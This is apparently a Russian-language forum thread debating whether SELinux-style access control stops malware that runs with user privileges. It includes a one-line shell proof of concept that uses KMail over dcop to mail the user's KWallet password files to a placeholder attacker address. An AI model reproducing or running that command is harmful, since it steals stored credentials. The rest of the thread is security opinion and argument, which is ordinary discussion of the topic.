>[оверквотинг удален]
>>
>>Если Вы помните, в похожей теме я высказывала аналогичную мысль (про sh-вирусы),
>>однако, Вы забываете о наличии MAC под Linux: тот же SELinux,
>>если корректно настроен, не даст ничего сделать любому протрояненному процессу, вроде
>>Postfix, если процесс работает не под рутом.
>
>PoC №1:
>
>#!/bin/sh
>dcop kmail MailTransportServiceIface sendMessage '<me@domain>' '<bugster@evil.xxx>' '' '' 'Stupid man passwords' 'All this shit' "`echo ${KDEHOME:-~/.kde}/share/apps/kwallet/* | sed -e 's/ /:/g'`"1. dcop уже в прошлом, как им пользовались, уже не помню :)
2. что-то мне подсказывает, что штатный способ обращения к kdewallet другой, а, значит, будет пресечено SELinux
>PoC №2:
Вырубится SELinux еще на попытке записать в /tmp
>[оверквотинг удален]
>>дело самого ближайшего будущего, так же не стоит забывать о том,
>>что большинство эсплойтов и вирусов будет запускаться с привелегиями юзера/браузера, а,
>>значит, эффективно пресекаться MAC, и изолироваться Cgroups(поспамить процессу просто не дадут!)
>
>Самые опасные с точки зрения последствий зловреды прекрасно чувствуют себя под юзером.
>Ведь самое ценное что: а) пользовательские данные (пароли, документы, статистика, на
>худой конец); б) возможность что-то выполнять от имени вроде как аутентичного
>пользователя. А контейнеры сами по себе тоже не панацея — сколько
>уязвимостей, дающих порой возможности более богатые, чем root (!), уже понаходили
>в системах виртуализации?..
опять же, MAC решает :)
>Если развитие MacOS X будет идти теми же темпами, ситуация с ней
>скоро (в течение пары лет) «исправится». ;)
Зачем? Если так удобно клепать ботнеты на Windows?
